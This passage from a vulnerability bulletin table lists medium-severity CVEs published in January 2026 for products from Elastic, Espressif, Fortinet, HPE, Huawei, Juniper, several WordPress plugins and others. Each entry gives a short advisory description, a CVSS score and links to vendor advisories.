| Elastic--Metricbeat | Improper Validation of Array Index (CWE-129) exists in Metricbeat and can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data. | 2026-01-13 | 6.5 | CVE-2026-0528 | https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519 |
| Elastic--Packetbeat | Improper Validation of Array Index (CWE-129) in Packetbeat's MongoDB protocol parser can allow an attacker to cause Overflow Buffers (CAPEC-100) through specially crafted network traffic. This requires an attacker to send a malformed payload to a monitored network interface where MongoDB protocol parsing is enabled. | 2026-01-14 | 6.5 | CVE-2026-0529 | https://discuss.elastic.co/t/packetbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-02/384520 |
| electric-studio--Electric Studio Download Counter | The Electric Studio Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2026-0741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a22bba3e-423a-4231-833b-c0be57a3bf7b?source=cve https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/trunk/electric-studio-download-counter.php#L186 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/tags/2.4/electric-studio-download-counter.php#L186 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/trunk/electric-studio-download-counter.php#L202 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/tags/2.4/electric-studio-download-counter.php#L202 |
| EnterpriseDB--Postgres Enterprise Manager (PEM) | PEM versions prior to 9.8.1 are affected by a stored Cross-site Scripting (XSS) vulnerability that allows users with access to the Manage Charts menu to inject arbitrary JavaScript when creating a new chart, which is then executed by any user accessing the chart. By default only the superuser and users with pem_admin or pem_super_admin privileges are able to access the Manage Charts menu. | 2026-01-16 | 6.5 | CVE-2026-0949 | https://www.enterprisedb.com/docs/security/advisories/cve20260949/ |
| espressif--esp-usb | Espressif ESP-IDF USB Host UVC Class Driver allows video streaming from USB cameras. Prior to 2.4.0, a vulnerability in the esp-usb UVC host implementation allows a malicious USB Video Class (UVC) device to trigger a stack buffer overflow during configuration-descriptor parsing. When UVC configuration-descriptor printing is enabled, the host prints detailed descriptor information provided by the connected USB device. A specially crafted UVC descriptor may advertise an excessively large length. Because this value is not validated before being copied into a fixed-size stack buffer, an attacker can overflow the buffer and corrupt memory. This vulnerability is fixed in 2.4.0. | 2026-01-12 | 6.8 | CVE-2025-68622 | https://github.com/espressif/esp-usb/security/advisories/GHSA-g65h-9ggq-9827 https://github.com/espressif/esp-usb/commit/77a38b15a17f6e3c7aeb620eb4aeaf61d5194cc0 https://components.espressif.com/components/espressif/usb_host_uvc/versions/2.4.0/changelog |
| espressif--esp-usb | Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, usb_class_request_get_descriptor() frees and reallocates hid_device->ctrl_xfer when an oversized descriptor is requested but continues to use the stale local pointer, leading to an immediate use-after-free when processing attacker-controlled Report Descriptor lengths. This vulnerability is fixed in 1.1.0. | 2026-01-12 | 6.8 | CVE-2025-68656 | https://github.com/espressif/esp-usb/security/advisories/GHSA-2pm2-62mr-c9x7 https://github.com/espressif/esp-usb/commit/81b37c96593c0bec92ef14c6ee6bf8cab8d8f660 https://components.espressif.com/components/espressif/usb_host_hid/versions/1.1.0/changelog |
| espressif--esp-usb | Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, calls to hid_host_device_close() can free the same usb_transfer_t twice. The USB event callback and user code share the hid_iface_t state without locking, so both can tear down a READY interface simultaneously, corrupting heap metadata inside the ESP USB host stack. This vulnerability is fixed in 1.1.0. | 2026-01-12 | 6.4 | CVE-2025-68657 | https://github.com/espressif/esp-usb/security/advisories/GHSA-gp8r-qjfr-gqfv https://github.com/espressif/esp-usb/commit/cd28106e9f72ac2719682c06f94601f9f034390b https://components.espressif.com/components/espressif/usb_host_hid/versions/1.1.0/changelog |
| floattechnologies--Float Payment Gateway | The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed. | 2026-01-14 | 5.3 | CVE-2025-15513 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2c7fb39-d128-4285-8bc3-1e192e1e1196?source=cve https://plugins.trac.wordpress.org/browser/float-gateway/tags/1.1.9/index.php#L477 |
| Fortinet--FortiClientEMS | An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands via crafted HTTP or HTTPS requests. | 2026-01-13 | 6.8 | CVE-2025-59922 | https://fortiguard.fortinet.com/psirt/FG-IR-25-735 |
| Fortinet--FortiVoice | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 allows a privileged attacker to delete files from the underlying filesystem via crafted HTTP or HTTPS requests. | 2026-01-13 | 5.7 | CVE-2025-58693 | https://fortiguard.fortinet.com/psirt/FG-IR-25-778 |
| GeoNetwork--GeoNetwork | Geonetwork 3.10 through 4.2.0 contains an XML external entity vulnerability in PDF rendering that allows attackers to retrieve arbitrary files from the server. Attackers can exploit the insecure XML parser by crafting a malicious XML document with external entity references to read system files through the baseURL parameter in PDF creation requests. | 2026-01-13 | 6.5 | CVE-2022-50899 | ExploitDB-50982 GeoNetwork Official Homepage VulnCheck Advisory: Geonetwork 4.2.0 - XML External Entity (XXE) |
| Geovision--GeoVision Geowebserver | GeoVision GeoWebServer 5.3.3 contains multiple vulnerabilities including local file inclusion, cross-site scripting, and remote code execution through improper input sanitization. Attackers can exploit the WebStrings.srf endpoint by manipulating path traversal and injection parameters to access system files and execute malicious scripts. | 2026-01-15 | 6.2 | CVE-2021-47795 | ExploitDB-50211 GeoVision Cyber Security Page VulnCheck Advisory: GeoVision Geowebserver 5.3.3 - Local File Inclusion |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has an Absolute Path Traversal vulnerability, allowing unauthenticated remote attackers to enumerate the system file directory. | 2026-01-16 | 5.3 | CVE-2026-1020 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| gothamdev--Gotham Block Extra Light | The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-14 | 6.5 | CVE-2025-15020 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56 |
| gothamdev--Gotham Block Extra Light | The Gotham Block Extra Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-15021 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c36899-3c7b-41b6-a38d-86c8834b4c03?source=cve https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/gothamblock.php?marks=463,470,495,500,504,519,564,578#L463 |
| guillaumev--LinkedIn SC | The LinkedIn SC plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'linkedin_sc_date_format', 'linkedin_sc_api_key', and 'linkedin_sc_secret_key' parameters in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2026-01-14 | 4.4 | CVE-2026-0812 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1c4fd888-aeaf-4451-a151-8f884bc22f0b?source=cve https://plugins.trac.wordpress.org/browser/linkedin-sc/tags/1.1.9/linkedin-sc.php#L164 https://plugins.trac.wordpress.org/browser/linkedin-sc/trunk/linkedin-sc.php#L164 |
| gurayyarar--SnipCommand | SnipCommand 0.1.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into command snippets. Attackers can execute arbitrary code by embedding malicious JavaScript that triggers remote command execution through file or title inputs. | 2026-01-16 | 6.1 | CVE-2021-47841 | ExploitDB-49829 SnipCommand GitHub Repository Proof of Concept Video VulnCheck Advisory: SnipCommand 0.1.0 - Persistent Cross-Site Scripting |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | A command injection vulnerability in AOS-8 allows an authenticated privileged user to alter a package header to inject shell commands, potentially affecting the execution of internal operations. Successful exploit could allow an authenticated malicious actor to execute commands with the privileges of the impacted mechanism. | 2026-01-13 | 6.5 | CVE-2025-37176 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An arbitrary file deletion vulnerability has been identified in the command-line interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation of this vulnerability could allow an authenticated remote malicious actor to delete arbitrary files within the affected system. | 2026-01-13 | 6.5 | CVE-2025-37177 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Multiple out-of-bounds read vulnerabilities were identified in a system component responsible for handling certain data buffers. Due to insufficient validation of maximum buffer size values, the process may attempt to read beyond the intended memory region. Under specific conditions, this can result in a crash of the affected process and a potential denial-of-service of the compromised process. | 2026-01-13 | 5.3 | CVE-2025-37178 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Multiple out-of-bounds read vulnerabilities were identified in a system component responsible for handling certain data buffers. Due to insufficient validation of maximum buffer size values, the process may attempt to read beyond the intended memory region. Under specific conditions, this can result in a crash of the affected process and a potential denial-of-service of the compromised process. | 2026-01-13 | 5.3 | CVE-2025-37179 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | A vulnerability exists in an Orchestrator service that could allow an unauthenticated remote attacker to bypass multi-factor authentication requirements. Successful exploitation could allow an attacker to create an admin user account without the necessary multi-factor authentication, thereby compromising the integrity of secured access to the system. | 2026-01-14 | 6.5 | CVE-2025-37184 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct stored cross-site scripting (XSS) attacks against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface and thereby make unauthorized arbitrary configuration changes to the host. | 2026-01-14 | 5.5 | CVE-2025-37185 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Huawei--HarmonyOS | Permission verification bypass vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 6.2 | CVE-2025-68959 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Data verification vulnerability in the HiView module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 6.2 | CVE-2025-68964 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the thermal management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 6.8 | CVE-2025-68969 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Permission verification bypass vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 6.1 | CVE-2025-68970 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 5.1 | CVE-2025-68961 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 5.1 | CVE-2025-68962 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Man-in-the-middle attack vulnerability in the Clone module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.7 | CVE-2025-68963 | https://consumer.huawei.com/en/support/bulletin/2026/1// |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.1 | CVE-2025-68966 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Vulnerability of improper permission control in the print module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.7 | CVE-2025-68967 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 4.7 | CVE-2025-68965 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Istio--Istio | Istio through 1.28.2 allows iptables rule injection for changing firewall behavior via the traffic.sidecar.istio.io/excludeInterfaces annotation. NOTE: the reporter's position is "this doesn't represent a security vulnerability (pod creators can already exclude sidecar injection entirely)." | 2026-01-15 | 4.1 | CVE-2026-23766 | https://github.com/istio/istio/issues/58781 https://github.com/istio/istio/pull/58785 |
| itsourcecode--Society Management System | A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-18 | 6.3 | CVE-2026-1118 | VDB-341710: itsourcecode Society Management System add_activity.php sql injection; VDB-341710: CTI Indicators (IOB, IOC, TTP, IOA); Submit #734289: itsourcecode Society Management System V1.0 SQL injection; https://github.com/AriazzzZ/CVE/issues/2 https://itsourcecode.com/ |
| jackdewey--Community Events | The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter. | 2026-01-17 | 5.3 | CVE-2025-14029 | https://www.wordfence.com/threat-intel/vulnerabilities/id/098c3f4c-b6bc-462a-98ef-30e6a68d74cf?source=cve https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L160 https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L160 https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437116%40community-events&new=3437116%40community-events&sfp_email=&sfph_mail= |
| jersou--Markdown Explorer | Markdown Explorer 0.1.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through file uploads and editor inputs. Attackers can upload markdown files with embedded JavaScript payloads to execute remote commands and potentially gain system access. | 2026-01-16 | 6.1 | CVE-2021-47836 | ExploitDB-49826 Markdown Explorer GitHub Repository Proof of Concept Video VulnCheck Advisory: Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting |
| jokkedk--Webgrind | Webgrind 1.1 and before contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts via the file parameter in index.php. The application does not sufficiently encode user-controlled inputs, allowing attackers to execute arbitrary JavaScript in victims' browsers by crafting malicious URLs. | 2026-01-13 | 6.1 | CVE-2023-54341 | ExploitDB-51074 Webgrind GitHub Repository VulnCheck Advisory: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) via file Parameter |
| Juniper Networks--Junos OS | An Improper Handling of Exceptional Conditions vulnerability in packet processing of Juniper Networks Junos OS allows an unauthenticated, network-adjacent attacker sending a specifically malformed ICMP packet to cause an FPC to crash and restart, resulting in a Denial of Service (DoS). When an ICMP packet is received with a specifically malformed IP header value, the FPC receiving the packet crashes and restarts. Due to the specific type of malformed packet, adjacent upstream routers would not forward the packet, limiting the attack surface to adjacent networks. This issue only affects ICMPv4. ICMPv6 is not vulnerable to this issue. This issue affects Junos OS: * all versions before 21.2R3-S9, * from 21.4 before 21.4R3-S10, * from 22.2 before 22.2R3-S7, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S5, * from 23.2 before 23.2R2-S3, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R1-S2, 24.2R2. | 2026-01-15 | 6.5 | CVE-2026-0203 | https://supportportal.juniper.net/JSA104294 https://kb.juniper.net/JSA104294 |
| Juniper Networks--Junos OS | A Stack-based Buffer Overflow vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS allows a network-based attacker, authenticated with low privileges to cause a Denial-of-Service (DoS). Subscribing to telemetry sensors at scale causes all FPC connections to drop, resulting in an FPC crash and restart. The issue was not seen when YANG packages for the specific sensors were installed. This issue affects Junos OS: * all versions before 22.4R3-S7, * 23.2 version before 23.2R2-S4, * 23.4 versions before 23.4R2. | 2026-01-15 | 6.5 | CVE-2026-21903 | https://supportportal.juniper.net/JSA106022 https://kb.juniper.net/JSA106022 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated attacker controlling an adjacent IS-IS neighbor to send a specific update packet causing a memory leak. Continued receipt and processing of these packets will exhaust all available memory, crashing rpd and creating a Denial of Service (DoS) condition. Memory usage can be monitored through the use of the 'show task memory detail' command. For example, two samples taken some time apart show the ted-infra counters growing: user@junos> show task memory detail \| match ted-infra TED-INFRA-COOKIE 25 1072 28 1184 229 user@junos> show task memory detail \| match ted-infra TED-INFRA-COOKIE 31 1360 34 1472 307 This issue affects: Junos OS: * from 23.2 before 23.2R2, * from 23.4 before 23.4R1-S2, 23.4R2, * from 24.1 before 24.1R2; Junos OS Evolved: * from 23.2 before 23.2R2-EVO, * from 23.4 before 23.4R1-S2-EVO, 23.4R2-EVO, * from 24.1 before 24.1R2-EVO. This issue does not affect Junos OS versions before 23.2R1 or Junos OS Evolved versions before 23.2R1-EVO. | 2026-01-15 | 6.5 | CVE-2026-21909 | https://supportportal.juniper.net/JSA106008 https://kb.juniper.net/JSA106008 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on EX4k Series and QFX5k Series platforms allows an unauthenticated network-adjacent attacker flapping an interface to cause traffic between VXLAN Network Identifiers (VNIs) to drop, leading to a Denial of Service (DoS). On all EX4k and QFX5k platforms, a link flap in an EVPN-VXLAN configuration Link Aggregation Group (LAG) results in Inter-VNI traffic dropping when there are multiple load-balanced next-hop routes for the same destination. This issue is only applicable to systems that support EVPN-VXLAN Virtual Port-Link Aggregation Groups (VPLAG), such as the QFX5110, QFX5120, QFX5200, EX4100, EX4300, EX4400, and EX4650. Service can only be restored by restarting the affected FPC via the 'request chassis fpc restart slot <slot-number>' command. This issue affects Junos OS on EX4k and QFX5k Series: * all versions before 21.4R3-S12, * all versions of 22.2 * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2. | 2026-01-15 | 6.5 | CVE-2026-21910 | https://supportportal.juniper.net/JSA106009 https://kb.juniper.net/JSA106009 |
| Juniper Networks--Junos OS | A Use After Free vulnerability in the chassis daemon (chassisd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker authenticated with low privileges to cause a Denial-of-Service (DoS). When telemetry collectors are frequently subscribing and unsubscribing to sensors continuously over a long period of time, telemetry-capable processes like chassisd, rpd or mib2d will crash and restart, which - depending on the process - can cause a complete outage until the system has recovered. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-EVO. | 2026-01-15 | 6.5 | CVE-2026-21921 | https://supportportal.juniper.net/JSA106021 https://kb.juniper.net/JSA106021 |
| Juniper Networks--Junos OS | An Untrusted Pointer Dereference vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, authenticated attacker with low privileges to cause a Denial-of-Service (DoS). When the command 'show route < ( receive-protocol | advertising-protocol ) bgp > detail' is executed, and at least one of the routes in the intended output has specific attributes, this will cause an rpd crash and restart. 'show route ... extensive' is not affected. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S5, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 5.5 | CVE-2025-59959 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103148 |
| Juniper Networks--Junos OS | An Incorrect Permission Assignment for Critical Resource vulnerability in the Juniper DHCP daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged user to write to the Unix socket used to manage the jdhcpd process, resulting in complete control over the resource. This vulnerability allows any low-privileged user logged into the system to connect to the Unix socket and issue commands to manage the DHCP service, in essence, taking administrative control of the local DHCP server or DHCP relay. This issue affects: Junos OS: * all versions before 21.2R3-S10, * all versions of 22.2, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R1-S1, 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-01-15 | 5.5 | CVE-2025-59961 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103150 |
| Juniper Networks--Junos OS | A NULL Pointer Dereference vulnerability in the chassis daemon (chassisd) of Juniper Networks Junos OS on MX, SRX and EX Series allows a local attacker with low privileges to cause a Denial-of-Service (DoS). When a user executes the 'show chassis' command with specifically crafted options, chassisd will crash and restart. Due to this all components but the Routing Engine (RE) in the chassis are reinitialized, which leads to a complete service outage, which the system automatically recovers from. This issue affects: Junos OS on MX, SRX and EX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2. | 2026-01-15 | 5.5 | CVE-2025-60007 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103173 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause an availability impact for downstream devices. When an affected device receives a specific optional, transitive BGP attribute over an existing BGP session, it will be erroneously modified before propagation to peers. When the attribute is detected as malformed by the peers, these peers will most likely terminate the BGP sessions with the affected devices and thereby cause an availability impact due to the resulting routing churn. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5 * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 5.8 | CVE-2025-60011 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103161 |
| Juniper Networks--Junos OS | A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in the method to collect FPC Ethernet firmware statistics of Juniper Networks Junos OS on MX10k Series allows a local, low-privileged attacker executing the 'show system firmware' CLI command to cause an LC480 or LC2101 line card to reset. On MX10k Series systems with LC480 or LC2101 line cards, repeated execution of the 'show system firmware' CLI command can cause the line card to crash and restart. Additionally, some time after the line card crashes, chassisd may also crash and restart, generating a core dump. This issue affects Junos OS on MX10k Series: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S9, * from 22.2 before 22.2R3-S7, * from 22.4 before 22.4R3-S6, * from 23.2 before 23.2R2-S2, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R2. | 2026-01-15 | 5.5 | CVE-2026-21912 | https://supportportal.juniper.net/JSA106011 https://kb.juniper.net/JSA106011 |
| Juniper Networks--Junos OS Evolved | An Incorrect Calculation vulnerability in the Layer 2 Control Protocol Daemon (l2cpd) of Juniper Networks Junos OS Evolved allows an unauthenticated network-adjacent attacker flapping the management interface to cause the learning of new MACs over label-switched interfaces (LSI) to stop while generating a flood of logs, resulting in high CPU usage. When the issue is seen, the following log message will be generated: op:1 flag:0x6 mac:xx:xx:xx:xx:xx:xx bd:2 ifl:13302 reason:0(REASON_NONE) i-op:6(INTRNL_OP_HW_FORCE_DELETE) status:10 lstatus:10 err:26(GETIFBD_VALIDATE_FAILED) err-reason 4(IFBD_VALIDATE_FAIL_EPOCH_MISMATCH) hw_wr:0x4 ctxsync:0 fwdsync:0 rtt-id:51 p_ifl:0 fwd_nh:0 svlbnh:0 event:- smask:0x100000000 dmask:0x0 mplsmask 0x1 act:0x5800 extf:0x0 pfe-id 0 hw-notif-ifl 13302 programmed-ifl 4294967295 pseudo-vtep underlay-ifl-idx 0 stack:GET_MAC, ALLOCATE_MAC, GET_IFL, GET_IFF, GET_IFBD, STOP, This issue affects Junos OS Evolved: * all versions before 21.4R3-S7-EVO, * from 22.2 before 22.2R3-S4-EVO, * from 22.3 before 22.3R3-S3-EVO, * from 22.4 before 22.4R3-S2-EVO, * from 23.2 before 23.2R2-S1-EVO, * from 23.4 before 23.4R1-S2-EVO, 23.4R2-EVO. | 2026-01-15 | 6.5 | CVE-2026-21911 | https://supportportal.juniper.net/JSA106010 https://kb.juniper.net/JSA106010 |
| Juniper Networks--Junos Space | A Use of a Broken or Risky Cryptographic Algorithm vulnerability in the TLS/SSL server of Juniper Networks Junos Space allows the use of static key ciphers (ssl-static-key-ciphers), reducing the confidentiality of on-path traffic communicated across the connection. These ciphers also do not support Perfect Forward Secrecy (PFS), affecting the long-term confidentiality of encrypted communications. This issue affects all versions of Junos Space before 24.1R5. | 2026-01-15 | 5.9 | CVE-2026-21907 | https://supportportal.juniper.net/JSA106006 https://kb.juniper.net/JSA106006 |
| Juniper Networks--Paragon Automation (Pathfinder, Planner, Insights) | A clickjacking vulnerability exists in the web portal of Juniper Networks Paragon Automation (Pathfinder, Planner, Insights) due to the application's failure to set appropriate X-Frame-Options and X-Content-Type HTTP headers. This vulnerability allows an attacker to trick users into interacting with the interface under the attacker's control. This issue affects all versions of Paragon Automation (Pathfinder, Planner, Insights) before 24.1.1. | 2026-01-15 | 6.1 | CVE-2025-52987 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103145 |
